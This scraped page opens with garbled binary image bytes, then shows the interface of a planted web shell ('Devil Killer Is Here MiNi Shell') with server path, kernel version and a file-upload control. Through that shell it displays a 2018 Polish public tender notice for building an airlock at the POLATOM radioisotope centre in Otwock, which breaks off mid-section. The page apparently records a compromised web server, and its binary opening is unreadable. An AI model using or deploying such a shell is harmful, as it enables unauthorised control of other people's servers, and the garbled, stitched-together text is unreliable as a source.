JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180824/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180824/608169-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 608169-N-2018 z dnia 2018-08-24 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Narodowe Centrum Badań Jądrowych Ośrodek Radioizotopów POLATOM</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Wykonanie śluzy farmaceutyczno-dozymetrycznej przy części D bud. 24".</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Narodowe Centrum Badań Jądrowych Ośrodek Radioizotopów POLATOM</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">102404300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Andrzeja Sołtana</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">7</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">05400 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Otwock</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 273 17 00, 273 17 01</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">w.wozniak@polatom.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 718 03 50</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.polatom.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Instytut Badawczy</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.polatom.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.polatom.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy złożyć/przesłać w zamkniętej kopercie i oznakowanej w ten sposób: Oferta - Nr sprawy 19/P/2018, nazwa zadania: ,,Wykonanie śluzy farmaceutyczno-dozymetrycznej przy części D bud. 24".</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">NCBJ OR POLATOM 05-400 Otwock ul. Andrzeja Sołtana 7</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Wykonanie śluzy farmaceutyczno-dozymetrycznej przy części D bud. 24".</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">19/P/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest wykonanie rozbiórki dobudówki i budowa śluzy komunikacyjnej przy bud. Nr 24 na terenie NCBJ na części działki nr ewidencyjny 17 w obrębie 257 w Otwocku. Realizacja zamówienia musi przebiegać zgodnie z etapami realizacji, określonymi w harmonogramie rzeczowo-finansowym stanowiącym Załącznik nr 8, który stanowi integralną część umowy.Szczegółowy opis przedmiotu zamówienia stanowi:o	Załącznik A - Opis przedmiotu zamówienia (projekt i STWiOR).Wymagania związane z realizacją zamówienia:o	Załącznik C - Dodatkowe wymaganiao	Załącznik D - RegulaminWykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w SIWZ wraz z załącznikami i we wzorze umowy stanowiącym Załącznik nr 5 do SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45210000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111300-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-04-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający wymaga, aby Wykonawca był wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w państwie członkowskim Unii Europejskiej, w którym posiada siedzibę. W Polsce rejestrami, o których mowa powyżej, są Krajowy Rejestr Sądowy oraz Centralna Ewidencja Informacji o Działalności Gospodarczej.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy PZP.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">c1. ma doświadczenie w wykonywaniu zadań, polegających na robotach remontowo-modernizacyjnych o podobnym zakresie i wartości co przedmiot zamówienia, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli czas prowadzenia działalności jest krótszy - w tym okresie,c2. dysponuje wykwalifikowanym personelem (dotyczy osoby odpowiedzialnej za kierowanie robotami budowlanymi), posiadającym uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a)	Zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.b)	Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.1)	Wykonawcy, który mają siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 10. a), 10. b) i 11. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w państwie członkowskim Unii Europejskiej w którym posiada siedzibę oraz wskazujące osobę/y uprawnione do reprezentacji Wykonawcy, nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne, albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony/e nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.2)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. 12. ppkt. 1), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Terminy ważności oświadczeń stosuje się odpowiednio.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, 